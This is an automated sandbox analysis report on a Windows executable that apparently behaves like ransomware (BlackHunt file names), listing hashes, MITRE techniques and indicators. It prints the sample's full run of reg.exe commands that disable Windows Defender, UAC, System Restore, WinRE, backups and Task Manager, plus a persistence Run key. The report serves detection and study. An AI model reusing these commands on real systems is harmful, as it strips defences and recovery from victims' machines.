b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc

Analysis

max time kernel
207s
max time network
207s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19/01/2024, 00:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Size

707KB
MD5

ac928fe1a769b639fe9cdb29ebdacf66
SHA1

1c4b6319cf226d237485abeaef32ef53ef675cf8
SHA256

b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc
SHA512

c613553e8ee96a8120d160d5b6a9e7df5fe145d067c6fd2d5ff43d7a3c9f54effeceb8a7453e01188f5c93cd7cceec9b675da0416019d25c18aff0f728e378ba
SSDEEP

6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1x8Dvnh:6uaTmkZJ+naie5OTamgEoKxLWcjh

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"	reg.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\P:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\S:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\Z:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\N:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\R:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\I:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\T:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\Y:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\A:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\G:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\J:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\X:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\Q:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\W:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\B:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\U:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\V:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\K:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\L:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\M:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\E:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
File opened (read-only)	\??\H:	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3656	schtasks.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Token: SeRestorePrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Token: SeBackupPrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Token: SeTakeOwnershipPrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Token: SeAuditPrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Token: SeSecurityPrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Token: SeIncBasePriorityPrivilege	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4340 wrote to memory of 764	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	90
PID 4340 wrote to memory of 764	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	90
PID 4340 wrote to memory of 3972	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	92
PID 4340 wrote to memory of 3972	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	92
PID 4340 wrote to memory of 3568	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	94
PID 4340 wrote to memory of 3568	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	94
PID 4340 wrote to memory of 2044	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	96
PID 4340 wrote to memory of 2044	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	96
PID 764 wrote to memory of 784	764	cmd.exe	98
PID 764 wrote to memory of 784	764	cmd.exe	98
PID 4340 wrote to memory of 4768	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	99
PID 4340 wrote to memory of 4768	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	99
PID 3972 wrote to memory of 4796	3972	cmd.exe	101
PID 3972 wrote to memory of 4796	3972	cmd.exe	101
PID 3568 wrote to memory of 4596	3568	cmd.exe	102
PID 3568 wrote to memory of 4596	3568	cmd.exe	102
PID 2044 wrote to memory of 2460	2044	cmd.exe	103
PID 2044 wrote to memory of 2460	2044	cmd.exe	103
PID 4768 wrote to memory of 868	4768	cmd.exe	104
PID 4768 wrote to memory of 868	4768	cmd.exe	104
PID 4340 wrote to memory of 4916	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	106
PID 4340 wrote to memory of 4916	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	106
PID 4340 wrote to memory of 1332	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	108
PID 4340 wrote to memory of 1332	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	108
PID 4340 wrote to memory of 2012	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	110
PID 4340 wrote to memory of 2012	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	110
PID 4340 wrote to memory of 4356	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	112
PID 4340 wrote to memory of 4356	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	112
PID 4340 wrote to memory of 5100	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	114
PID 4340 wrote to memory of 5100	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	114
PID 4340 wrote to memory of 1632	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	116
PID 4340 wrote to memory of 1632	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	116
PID 2012 wrote to memory of 1876	2012	cmd.exe	118
PID 2012 wrote to memory of 1876	2012	cmd.exe	118
PID 4340 wrote to memory of 2304	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	117
PID 4340 wrote to memory of 2304	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	117
PID 4916 wrote to memory of 4804	4916	cmd.exe	120
PID 4916 wrote to memory of 4804	4916	cmd.exe	120
PID 1332 wrote to memory of 228	1332	cmd.exe	121
PID 1332 wrote to memory of 228	1332	cmd.exe	121
PID 4340 wrote to memory of 2104	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	123
PID 4340 wrote to memory of 2104	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	123
PID 4340 wrote to memory of 4688	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	125
PID 4340 wrote to memory of 4688	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	125
PID 4356 wrote to memory of 1204	4356	cmd.exe	126
PID 4356 wrote to memory of 1204	4356	cmd.exe	126
PID 4340 wrote to memory of 884	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	128
PID 4340 wrote to memory of 884	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	128
PID 4340 wrote to memory of 2152	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	130
PID 4340 wrote to memory of 2152	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	130
PID 5100 wrote to memory of 208	5100	cmd.exe	150
PID 5100 wrote to memory of 208	5100	cmd.exe	150
PID 4340 wrote to memory of 3968	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	149
PID 4340 wrote to memory of 3968	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	149
PID 4340 wrote to memory of 3492	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	132
PID 4340 wrote to memory of 3492	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	132
PID 1632 wrote to memory of 3608	1632	cmd.exe	147
PID 1632 wrote to memory of 3608	1632	cmd.exe	147
PID 4340 wrote to memory of 4244	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	135
PID 4340 wrote to memory of 4244	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	135
PID 2304 wrote to memory of 3344	2304	cmd.exe	133
PID 2304 wrote to memory of 3344	2304	cmd.exe	133
PID 4340 wrote to memory of 4148	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	140
PID 4340 wrote to memory of 4148	4340	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe	140

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe
"C:\Users\Admin\AppData\Local\Temp\b87335553543a329f69cc8784d7917cdb34dd7d9ea2ac625c4f714083be5e9cc.exe"
1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:764
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    3⤵
    - Modifies registry class
    PID:784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3972
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:4796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3568
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    3⤵
    - Modifies registry class
    PID:4596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2044
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:2460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    3⤵
    - Adds Run key to start application
    PID:868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:4804
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1332
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    3⤵
    PID:1876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4356
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    3⤵
    PID:1204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    3⤵
    PID:208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    3⤵
    PID:3608
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    3⤵
    PID:3344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    3⤵
    PID:4968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  2⤵
  PID:4688
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    3⤵
    PID:3084
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  2⤵
  PID:884
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    3⤵
    PID:2100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  2⤵
  PID:2152
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    3⤵
    PID:1176
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:3492
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:3208
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  2⤵
  PID:4244
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    3⤵
    PID:4060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  2⤵
  PID:3848
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    3⤵
    PID:1488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:4148
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:2792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  2⤵
  PID:3640
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    3⤵
    PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  2⤵
  PID:4644
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    3⤵
    PID:1684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:4036
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:2056
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  2⤵
  PID:1168
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    3⤵
    PID:2748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  2⤵
  PID:3968
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    3⤵
    PID:4360
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  2⤵
  PID:2320
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    3⤵
    PID:2264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  2⤵
  PID:5004
- - C:\Windows\system32\reg.exe
